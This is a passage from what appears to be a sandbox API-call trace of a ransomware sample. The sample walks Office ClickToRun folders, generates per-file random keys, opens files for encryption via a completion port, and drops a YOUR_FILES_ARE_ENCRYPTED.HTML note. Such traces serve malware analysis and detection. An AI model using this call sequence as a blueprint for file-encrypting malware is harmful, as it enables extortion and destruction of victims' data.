dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0155.268] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=22373) returned 1 [0155.268] GetProcessHeap () returned 0x270000 [0155.268] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7420068 [0155.281] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="7F") returned 2 [0155.281] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="1E") returned 2 [0155.281] wsprintfW (in: param_1=0x4ebd732, 
param_2="%02X" | out: param_1="DB") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="12") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="4D") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="DB") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="8F") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="A5") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="76") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="35") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="30") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="AD") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="EE") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="55") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="A9") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="84") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="0C") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="BC") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="11") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="AA") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="9C") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="22") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="DE") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="01") returned 2 [0155.282] wsprintfW 
(in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="64") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="39") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="78") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="F0") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="7A") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="C5") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="D9") returned 2 [0155.282] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="7D") returned 2 [0155.283] lstrcpyW (in: lpString1=0x743011c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\MasterDescriptor.en-us.xml" [0155.283] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7420068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.283] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7420068, lpOverlapped=0x7420068) returned 1 [0155.285] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4698d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4698d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x0, dwReserved1=0x60, cFileName="s321033.hash", cAlternateFileName="S32103~1.HAS")) 
returned 1 [0155.285] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\s321033.hash") returned 98 [0155.286] lstrcmpW (lpString1="s321033.hash", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.286] PathFindExtensionW (pszPath="s321033.hash") returned=".hash" [0155.288] lstrlenW (lpString=".hash") returned 5 [0155.288] PathFindExtensionW (pszPath="s321033.hash") returned=".hash" [0155.288] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4698d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4698d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x21ebc700, ftLastWriteTime.dwHighDateTime=0x1d0d7ef, nFileSizeHigh=0x0, nFileSizeLow=0xd81d4, dwReserved0=0x0, dwReserved1=0x60, cFileName="stream.x86.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0155.288] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat") returned 110 [0155.288] lstrcmpW (lpString1="stream.x86.en-us.man.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.288] PathFindExtensionW (pszPath="stream.x86.en-us.man.dat") returned=".dat" [0155.288] lstrlenW (lpString=".dat") returned 4 [0155.288] PathFindExtensionW (pszPath="stream.x86.en-us.man.dat") returned=".dat" [0155.288] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0155.288] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat" (normalized: 
"c:\\programdata\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\en-us.16\\stream.x86.en-us.man.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0155.299] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=885204) returned 1 [0155.300] GetProcessHeap () returned 0x270000 [0155.300] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7420068 [0155.300] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="95") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="A3") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="B6") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="3F") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="80") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="3A") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="D7") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="F8") returned 2 [0155.300] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="A4") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="EB") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="C9") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="04") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="42") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="E1") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="80") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="2A") 
returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="C5") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="77") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="68") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="89") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="9B") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="A6") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="BE") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="A3") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="B8") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="32") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="FF") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="98") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="69") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="0A") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="AB") returned 2 [0155.301] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="26") returned 2 [0155.302] lstrcpyW (in: lpString1=0x743011c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\stream.x86.en-us.man.dat" [0155.302] CreateIoCompletionPort (FileHandle=0x594, 
ExistingCompletionPort=0x3a0, CompletionKey=0x7420068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.302] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7420068, lpOverlapped=0x7420068) returned 1 [0155.304] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4698d0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4698d0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x21ebc700, ftLastWriteTime.dwHighDateTime=0x1d0d7ef, nFileSizeHigh=0x0, nFileSizeLow=0xd81d4, dwReserved0=0x0, dwReserved1=0x60, cFileName="stream.x86.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0155.304] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0155.304] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0155.332] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\en-us.16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0155.333] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0155.335] CloseHandle (hObject=0x594) returned 1 [0155.336] GetProcessHeap () returned 0x270000 [0155.336] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7410060 | out: 
hHeap=0x270000) returned 1 [0155.336] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e48fa30, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e501e50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e501e50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x-none.16", cAlternateFileName="")) returned 1 [0155.336] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16") returned 86 [0155.336] GetProcessHeap () returned 0x270000 [0155.336] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7410060 [0155.337] lstrcpyW (in: lpString1=0x7410060, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16" [0155.337] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\*" [0155.337] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e48fa30, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e501e50, 
ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e501e50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0155.337] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e48fa30, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e501e50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e501e50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.337] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4dbcf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4dbcf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x206dcf00, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x5220, dwReserved0=0x0, dwReserved1=0x60, cFileName="MasterDescriptor.x-none.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0155.337] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml") returned 114 [0155.337] lstrcmpW (lpString1="MasterDescriptor.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.337] PathFindExtensionW (pszPath="MasterDescriptor.x-none.xml") returned=".xml" [0155.337] lstrlenW (lpString=".xml") returned 4 [0155.337] PathFindExtensionW (pszPath="MasterDescriptor.x-none.xml") returned=".xml" [0155.337] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) 
returned 1 [0155.337] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0155.338] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=21024) returned 1 [0155.338] GetProcessHeap () returned 0x270000 [0155.338] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7420068 [0155.339] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="75") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="DB") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="66") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="12") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="43") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="30") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="D6") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="35") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="E5") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="8D") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="01") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="5B") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="1C") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="A3") 
returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="58") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="20") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="E7") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="BA") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="B0") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="B6") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="F6") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="1C") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="3E") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="0F") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="E6") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="BD") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="22") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="E8") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="A6") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="7F") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="3C") returned 2 [0155.340] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="05") returned 2 [0155.340] lstrcpyW (in: lpString1=0x743011c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml") 
returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml" [0155.340] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7420068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.340] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7420068, lpOverlapped=0x7420068) returned 1 [0155.342] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4dbcf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4dbcf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x0, dwReserved1=0x60, cFileName="s320.hash", cAlternateFileName="S320~1.HAS")) returned 1 [0155.342] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\s320.hash") returned 96 [0155.342] lstrcmpW (lpString1="s320.hash", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.342] PathFindExtensionW (pszPath="s320.hash") returned=".hash" [0155.342] lstrlenW (lpString=".hash") returned 5 [0155.343] PathFindExtensionW (pszPath="s320.hash") returned=".hash" [0155.343] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4dbcf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4dbcf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x32e90800, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x38b5ce, dwReserved0=0x0, dwReserved1=0x60, cFileName="stream.x86.x-none.man.dat", 
cAlternateFileName="STREAM~1.DAT")) returned 1 [0155.343] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat") returned 112 [0155.343] lstrcmpW (lpString1="stream.x86.x-none.man.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.343] PathFindExtensionW (pszPath="stream.x86.x-none.man.dat") returned=".dat" [0155.343] lstrlenW (lpString=".dat") returned 4 [0155.343] PathFindExtensionW (pszPath="stream.x86.x-none.man.dat") returned=".dat" [0155.343] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0155.343] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\x-none.16\\stream.x86.x-none.man.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0155.351] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=3716558) returned 1 [0155.351] GetProcessHeap () returned 0x270000 [0155.351] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7420068 [0155.352] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="76") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="61") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="DB") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="F4") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="80") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="A9") returned 2 
[0155.352] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="0B") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="FF") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="51") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="B0") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="93") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="23") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="2C") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="90") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="AF") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="A3") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="CA") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="2A") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="90") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="22") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="00") returned 2 [0155.353] wsprintfW (in: 